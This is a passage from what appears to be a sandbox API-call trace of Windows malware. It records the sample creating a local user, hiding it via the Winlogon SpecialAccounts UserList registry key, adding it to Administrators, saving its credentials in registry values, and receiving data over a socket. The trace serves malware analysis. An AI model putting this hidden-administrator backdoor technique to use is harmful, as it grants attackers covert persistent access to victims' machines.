dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.781] GetProcessHeap () returned 0x650000 [0311.781] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8a) returned 0x681fc8 [0311.781] lstrlenW (lpString="%SystemRoot%\\System32\\termsrv.dll") returned 33 [0311.781] VirtualAlloc (lpAddress=0x0, dwSize=0x44, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0311.781] lstrlenW (lpString="%SystemRoot%\\System32\\termsrv.dll") returned 33 [0311.781] lstrcpyW (in: lpString1=0x3780000, lpString2="%SystemRoot%\\System32\\termsrv.dll" | out: lpString1="%SystemRoot%\\System32\\termsrv.dll") returned="%SystemRoot%\\System32\\termsrv.dll" [0311.781] GetProcessHeap () returned 0x650000 [0311.782] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x681fc8 | out: hHeap=0x650000) returned 1 [0311.782] lstrcmpW (lpString1="%SystemRoot%\\System32\\termsrv.dll", lpString2="%ProgramFiles%\\Microsoft DN1\\sqlmap.dll") returned 1 [0311.782] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.782] GetProcessHeap () returned 0x650000 [0311.783] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67c640 | out: hHeap=0x650000) returned 1 [0311.783] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.783] RegCloseKey (hKey=0x358) returned 0x0 [0311.783] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77760000 [0311.784] GetProcAddress (hModule=0x77760000, lpProcName="RtlGetVersion") returned 0x777bdbb0 [0311.784] RtlGetVersion (in: lpVersionInformation=0x2c7f69c | out: lpVersionInformation=0x2c7f69c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0311.784] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77760000 [0311.784] GetProcAddress (hModule=0x77760000, lpProcName="RtlGetVersion") returned 0x777bdbb0 [0311.784] RtlGetVersion (in: lpVersionInformation=0x2c7f69c | out: lpVersionInformation=0x2c7f69c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0311.784] GetCurrentProcess () returned 0xffffffff [0311.784] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x2c7f7b4 | out: TokenHandle=0x2c7f7b4*=0x358) returned 1 [0311.784] GetTokenInformation (in: TokenHandle=0x358, TokenInformationClass=0x14, TokenInformation=0x2c7f7ac, TokenInformationLength=0x4, ReturnLength=0x2c7f7b0 | out: TokenInformation=0x2c7f7ac, ReturnLength=0x2c7f7b0) returned 1 [0311.784] CloseHandle (hObject=0x358) returned 1 [0311.784] GetProcessHeap () returned 0x650000 [0311.784] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x672590 [0311.784] lstrlenA (lpString="BsCbnow") returned 7 [0311.784] lstrlenA (lpString="BsCbnow") returned 7 [0311.784] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0311.785] lstrcpyA (in: lpString1=0x3760000, lpString2="BsCbnow" | out: lpString1="BsCbnow") returned="BsCbnow" [0311.785] lstrlenA (lpString="BsCbnow") returned 7 [0311.785] lstrlenA (lpString="BsCbnow") returned 7 [0311.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x3760000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0311.785] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0311.785] lstrlenA (lpString="BsCbnow") returned 7 [0311.785] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3760000, cbMultiByte=-1, lpWideCharStr=0x3780000, cchWideChar=18 | out: lpWideCharStr="BsCbnow") returned 8 [0311.785] lstrlenW (lpString="BsCbnow") returned 7 [0311.785] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0311.785] lstrlenW (lpString="BsCbnow") returned 7 [0311.785] lstrcpyW (in: lpString1=0x3790000, lpString2="BsCbnow" | out: lpString1="BsCbnow") returned="BsCbnow" [0311.786] lstrlenW (lpString="BsCbnow") returned 7 [0311.786] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x4750000 [0311.786] lstrcpyW (in: lpString1=0x4750000, lpString2="BsCbnow" | out: lpString1="BsCbnow") returned="BsCbnow" [0311.786] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.787] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.787] lstrlenW (lpString="BsCbnow") returned 7 [0311.787] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0311.787] lstrcatW (in: lpString1="", lpString2="BsCbnow" | out: lpString1="BsCbnow") returned="BsCbnow" [0311.787] VirtualFree (lpAddress=0x4750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.788] VirtualFree (lpAddress=0x3760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.789] GetProcessHeap () returned 0x650000 [0311.789] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x672590 | out: hHeap=0x650000) returned 1 [0311.789] lstrlenW (lpString="BsCbnow") returned 7 [0311.789] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3760000 [0311.789] lstrcpyW (in: lpString1=0x3760000, lpString2="BsCbnow" | out: lpString1="BsCbnow") returned="BsCbnow" [0311.789] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.790] GetProcessHeap () returned 0x650000 [0311.790] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6725f0 [0311.790] lstrlenA (lpString="duqJGyI") returned 7 [0311.790] lstrlenA (lpString="duqJGyI") returned 7 [0311.790] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0311.790] lstrcpyA (in: lpString1=0x3780000, lpString2="duqJGyI" | out: lpString1="duqJGyI") returned="duqJGyI" [0311.790] lstrlenA (lpString="duqJGyI") returned 7 [0311.790] lstrlenA (lpString="duqJGyI") returned 7 [0311.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x3780000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0311.790] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0311.790] lstrlenA (lpString="duqJGyI") returned 7 [0311.790] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3780000, cbMultiByte=-1, lpWideCharStr=0x3790000, cchWideChar=18 | out: lpWideCharStr="duqJGyI") returned 8 [0311.790] lstrlenW (lpString="duqJGyI") returned 7 [0311.790] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x4750000 [0311.791] lstrlenW (lpString="duqJGyI") returned 7 [0311.791] lstrcpyW (in: lpString1=0x4750000, lpString2="duqJGyI" | out: lpString1="duqJGyI") returned="duqJGyI" [0311.791] lstrlenW (lpString="duqJGyI") returned 7 [0311.791] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x4760000 [0311.791] lstrcpyW (in: lpString1=0x4760000, lpString2="duqJGyI" | out: lpString1="duqJGyI") returned="duqJGyI" [0311.791] VirtualFree (lpAddress=0x4750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.792] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.793] lstrlenW (lpString="duqJGyI") returned 7 [0311.793] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0311.793] lstrcatW (in: lpString1="", lpString2="duqJGyI" | out: lpString1="duqJGyI") returned="duqJGyI" [0311.793] VirtualFree (lpAddress=0x4760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.794] VirtualFree (lpAddress=0x3780000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.795] GetProcessHeap () returned 0x650000 [0311.795] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6725f0 | out: hHeap=0x650000) returned 1 [0311.795] lstrlenW (lpString="duqJGyI") returned 7 [0311.796] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x3780000 [0311.796] lstrcpyW (in: lpString1=0x3780000, lpString2="duqJGyI" | out: lpString1="duqJGyI") returned="duqJGyI" [0311.796] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0311.797] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf013f, lpSecurityAttributes=0x0, phkResult=0x2c7f7ec, lpdwDisposition=0x2c7f7e4 | out: phkResult=0x2c7f7ec*=0x358, lpdwDisposition=0x2c7f7e4*=0x1) returned 0x0 [0311.798] RegSetValueExW (in: hKey=0x358, lpValueName="BsCbnow", Reserved=0x0, dwType=0x4, lpData=0x2c7f7e8*=0x0, cbData=0x4 | out: lpData=0x2c7f7e8*=0x0) returned 0x0 [0311.799] RegCloseKey (hKey=0x358) returned 0x0 [0311.799] NetUserAdd (in: servername=0x0, level=0x1, buf=0x2c7f790*(usri1_name="BsCbnow", usri1_password="duqJGyI", usri1_password_age=0x0, usri1_priv=0x1, usri1_home_dir=0x0, usri1_comment=0x0, usri1_flags=0x10201, usri1_script_path=0x0), parm_err=0x0 | out: buf=0x2c7f790*(usri1_name="BsCbnow", usri1_password="duqJGyI", usri1_password_age=0x0, usri1_priv=0x1, usri1_home_dir=0x0, usri1_comment=0x0, usri1_flags=0x10201, usri1_script_path=0x0), parm_err=0x0) returned 0x0 [0311.998] AllocateAndInitializeSid (in: pIdentifierAuthority=0x2c7f76c, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x2c7f774 | out: pSid=0x2c7f774*=0x678c40*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0311.998] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x678c40*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), Name=0x2c7f538, cchName=0x2c7f764, ReferencedDomainName=0x2c7f740, cchReferencedDomainName=0x2c7f768, peUse=0x2c7f760 | out: Name="Administrators", cchName=0x2c7f764, ReferencedDomainName="BUILTIN", cchReferencedDomainName=0x2c7f768, peUse=0x2c7f760) returned 1 [0312.000] lstrlenW (lpString="Administrators") returned 14 [0312.000] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0312.000] lstrlenW (lpString="Administrators") returned 14 [0312.000] lstrcpyW (in: lpString1=0x3790000, lpString2="Administrators" | out: lpString1="Administrators") returned="Administrators" [0312.001] NetLocalGroupAddMembers (in: servername=0x0, groupname="Administrators", level=0x3, buf=0x2c7f7b8*(lgrmi3_domainandname="BsCbnow"), totalentries=0x1 | out: buf=0x2c7f7b8*(lgrmi3_domainandname="BsCbnow")) returned 0x0 [0312.021] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0312.022] lstrlenW (lpString="rudp") returned 4 [0312.022] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0312.022] lstrlenW (lpString="rudp") returned 4 [0312.022] lstrcpyW (in: lpString1=0x3790000, lpString2="rudp" | out: lpString1="rudp") returned="rudp" [0312.022] lstrlenW (lpString="BsCbnow") returned 7 [0312.022] GetProcessHeap () returned 0x650000 [0312.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678be0 [0312.022] RegSetValueExW (in: hKey=0x294, lpValueName="rudp", Reserved=0x0, dwType=0x1, lpData="BsCbnow", cbData=0x10 | out: lpData="BsCbnow") returned 0x0 [0312.023] GetProcessHeap () returned 0x650000 [0312.023] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678be0 | out: hHeap=0x650000) returned 1 [0312.023] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0312.023] lstrlenW (lpString="rpdp") returned 4 [0312.023] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x3790000 [0312.024] lstrlenW (lpString="rpdp") returned 4 [0312.024] lstrcpyW (in: lpString1=0x3790000, lpString2="rpdp" | out: lpString1="rpdp") returned="rpdp" [0312.024] lstrlenW (lpString="duqJGyI") returned 7 [0312.024] GetProcessHeap () returned 0x650000 [0312.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x10) returned 0x678c88 [0312.024] RegSetValueExW (in: hKey=0x294, lpValueName="rpdp", Reserved=0x0, dwType=0x1, lpData="duqJGyI", cbData=0x10 | out: lpData="duqJGyI") returned 0x0 [0312.024] GetProcessHeap () returned 0x650000 [0312.024] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678c88 | out: hHeap=0x650000) returned 1 [0312.024] VirtualFree (lpAddress=0x3790000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0312.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x29fe2e7, lpParameter=0x2b3e020, dwCreationFlags=0x0, lpThreadId=0x2b3e03c | out: lpThreadId=0x2b3e03c*=0xd90) returned 0x360 [0312.025] GetProcessHeap () returned 0x650000 [0312.025] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678bc8 | out: hHeap=0x650000) returned 1 [0312.025] recv (in: s=0x2c0, buf=0x2c7f860, len=12, flags=0 | out: buf=0x2c7f860*) returned 12 [0312.297] GetProcessHeap () returned 0x650000 [0312.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ca0 [0312.297] GetProcessHeap () returned 0x650000 [0312.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cb8 [0312.297] GetProcessHeap () returned 0x650000 [0312.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678cd0 [0312.297] GetProcessHeap () returned 0x650000 [0312.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ce8 [0312.297] GetProcessHeap () returned 0x650000 [0312.297] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678d00 [0312.297] GetProcessHeap () returned 0x650000 [0312.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ce8 | out: hHeap=0x650000) returned 1 [0312.297] GetProcessHeap () returned 0x650000 [0312.297] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cd0 | out: hHeap=0x650000) returned 1 [0312.298] GetProcessHeap () returned 0x650000 [0312.298] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0312.298] recv (in: s=0x2c0, buf=0x2c7f86c, len=60016, flags=0 | out: buf=0x2c7f86c*) returned 1448 [0312.298] recv (in: s=0x2c0, buf=0x2c7fe14, len=58568, flags=0 | out: buf=0x2c7fe14*) returned 58568 [0313.542] GetProcessHeap () returned 0x650000 [0313.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d00 | out: hHeap=0x650000) returned 1 [0313.542] GetProcessHeap () returned 0x650000 [0313.542] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0313.542] GetProcessHeap () returned 0x650000 [0313.542] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0313.543] GetProcessHeap () returned 0x650000 [0313.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x695630 [0313.544] GetProcessHeap () returned 0x650000 [0313.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678d18 [0313.544] GetProcessHeap () returned 0x650000 [0313.544] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6affa8 [0313.546] GetProcessHeap () returned 0x650000 [0313.546] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6bea30 [0313.547] GetProcessHeap () returned 0x650000 [0313.548] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6affa8 | out: hHeap=0x650000) returned 1 [0313.549] GetProcessHeap () returned 0x650000 [0313.549] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d18 | out: hHeap=0x650000) returned 1 [0313.549] GetProcessHeap () returned 0x650000 [0313.550] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0313.550] GetProcessHeap () returned 0x650000 [0313.550] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6affa8 [0313.552] GetProcessHeap () returned 0x650000 [0313.552] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0313.553] GetProcessHeap () returned 0x650000 [0313.553] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bea30 | out: hHeap=0x650000) returned 1 [0313.555] GetProcessHeap () returned 0x650000 [0313.555] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea70) returned 0x6bea30 [0313.556] GetProcessHeap () returned 0x650000 [0313.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x67ffa8 [0313.556] GetProcessHeap () returned 0x650000 [0313.556] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x686ba8 [0313.557] GetProcessHeap () returned 0x650000 [0313.557] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x695610 [0313.557] GetProcessHeap () returned 0x650000 [0313.558] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0313.559] GetProcessHeap () returned 0x650000 [0313.559] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x686ba8 [0313.560] GetProcessHeap () returned 0x650000 [0313.560] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695610 | out: hHeap=0x650000) returned 1 [0313.561] GetProcessHeap () returned 0x650000 [0313.561] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x695610 [0313.562] GetProcessHeap () returned 0x650000 [0313.562] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6cd4a8 [0313.564] GetProcessHeap () returned 0x650000 [0313.565] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695610 | out: hHeap=0x650000) returned 1 [0313.565] GetProcessHeap () returned 0x650000 [0313.565] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0313.566] GetProcessHeap () returned 0x650000 [0313.567] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6affa8 | out: hHeap=0x650000) returned 1 [0313.567] GetProcessHeap () returned 0x650000 [0313.568] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bea30 | out: hHeap=0x650000) returned 1 [0313.569] recv (in: s=0x2c0, buf=0x2c7f860, len=12, flags=0 | out: buf=0x2c7f860*) returned 12 [0313.569] GetProcessHeap () returned 0x650000 [0313.569] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cb8 [0313.569] GetProcessHeap () returned 0x650000 [0313.569] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ca0 [0313.569] GetProcessHeap () returned 0x650000 [0313.569] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678d30 [0313.569] GetProcessHeap () returned 0x650000 [0313.569] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cd0 [0313.569] GetProcessHeap () returned 0x650000 [0313.569] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ce8 [0313.569] GetProcessHeap () returned 0x650000 [0313.569] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cd0 | out: hHeap=0x650000) returned 1 [0313.569] GetProcessHeap () returned 0x650000 [0313.569] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d30 | out: hHeap=0x650000) returned 1 [0313.569] GetProcessHeap () returned 0x650000 [0313.569] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0313.569] recv (in: s=0x2c0, buf=0x2c7f86c, len=60016, flags=0 | out: buf=0x2c7f86c*) returned 2740 [0313.569] recv (in: s=0x2c0, buf=0x2c80320, len=57276, flags=0 | out: buf=0x2c80320*) returned 57276 [0314.164] GetProcessHeap () returned 0x650000 [0314.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ce8 | out: hHeap=0x650000) returned 1 [0314.164] GetProcessHeap () returned 0x650000 [0314.164] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0314.164] GetProcessHeap () returned 0x650000 [0314.164] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6affa8 [0314.166] GetProcessHeap () returned 0x650000 [0314.166] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0314.168] GetProcessHeap () returned 0x650000 [0314.168] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ca0 [0314.168] GetProcessHeap () returned 0x650000 [0314.168] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x695630 [0314.170] GetProcessHeap () returned 0x650000 [0314.170] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6dbf10 [0314.171] GetProcessHeap () returned 0x650000 [0314.172] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0314.172] GetProcessHeap () returned 0x650000 [0314.172] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0314.172] GetProcessHeap () returned 0x650000 [0314.173] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0314.175] GetProcessHeap () returned 0x650000 [0314.175] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0314.177] GetProcessHeap () returned 0x650000 [0314.177] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6affa8 | out: hHeap=0x650000) returned 1 [0314.179] GetProcessHeap () returned 0x650000 [0314.180] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6dbf10 | out: hHeap=0x650000) returned 1 [0314.181] GetProcessHeap () returned 0x650000 [0314.181] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea70) returned 0x6dbf10 [0314.183] GetProcessHeap () returned 0x650000 [0314.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x680128 [0314.183] GetProcessHeap () returned 0x650000 [0314.183] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x695630 [0314.185] GetProcessHeap () returned 0x650000 [0314.185] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6affa8 [0314.186] GetProcessHeap () returned 0x650000 [0314.188] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x695630 | out: hHeap=0x650000) returned 1 [0314.188] GetProcessHeap () returned 0x650000 [0314.188] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6bea10 [0314.189] GetProcessHeap () returned 0x650000 [0314.190] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6affa8 | out: hHeap=0x650000) returned 1 [0314.191] GetProcessHeap () returned 0x650000 [0314.191] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea60) returned 0x6affa8 [0314.191] GetProcessHeap () returned 0x650000 [0314.191] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6cd4a8, Size=0x1c800) returned 0x6ea988 [0314.194] SetEvent (hEvent=0x258) returned 1 [0314.194] GetProcessHeap () returned 0x650000 [0314.195] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6affa8 | out: hHeap=0x650000) returned 1 [0314.197] GetProcessHeap () returned 0x650000 [0314.198] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bea10 | out: hHeap=0x650000) returned 1 [0314.201] GetProcessHeap () returned 0x650000 [0314.202] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x686ba8 | out: hHeap=0x650000) returned 1 [0314.205] GetProcessHeap () returned 0x650000 [0314.205] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6dbf10 | out: hHeap=0x650000) returned 1 [0314.217] recv (in: s=0x2c0, buf=0x2c7f860, len=12, flags=0 | out: buf=0x2c7f860*) returned 12 [0314.368] GetProcessHeap () returned 0x650000 [0314.368] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ca0 [0314.368] GetProcessHeap () returned 0x650000 [0314.368] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678cb8 [0314.368] GetProcessHeap () returned 0x650000 [0314.368] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678cd0 [0314.368] GetProcessHeap () returned 0x650000 [0314.368] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678ce8 [0314.368] GetProcessHeap () returned 0x650000 [0314.368] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xc) returned 0x678d00 [0314.368] GetProcessHeap () returned 0x650000 [0314.368] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ce8 | out: hHeap=0x650000) returned 1 [0314.369] GetProcessHeap () returned 0x650000 [0314.369] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cd0 | out: hHeap=0x650000) returned 1 [0314.369] GetProcessHeap () returned 0x650000 [0314.369] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678cb8 | out: hHeap=0x650000) returned 1 [0314.369] recv (in: s=0x2c0, buf=0x2c7f86c, len=60016, flags=0 | out: buf=0x2c7f86c*) returned 17508 [0314.369] recv (in: s=0x2c0, buf=0x2c83cd0, len=42508, flags=0 | out: buf=0x2c83cd0*) returned 42508 [0314.749] GetProcessHeap () returned 0x650000 [0314.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678d00 | out: hHeap=0x650000) returned 1 [0314.750] GetProcessHeap () returned 0x650000 [0314.750] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x678ca0 | out: hHeap=0x650000) returned 1 [0314.750] GetProcessHeap () returned 0x650000 [0314.750] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6cc7b0 [0314.752] GetProcessHeap () returned 0x650000 [0314.752] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x6db238 [0314.753] GetProcessHeap () returned 0x650000 [0314.753] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb) returned 0x678ca0 [0314.753] GetProcessHeap () returned 0x650000 [0314.754] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x686ba8 [0314.756] GetProcessHeap () returned 0x650000 [0314.756] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xea7c) returned 0x695630 [0314.757] GetProcessHeap () returned 0x650000 [0314.758] HeapFree (in: hHeap=0x650000, 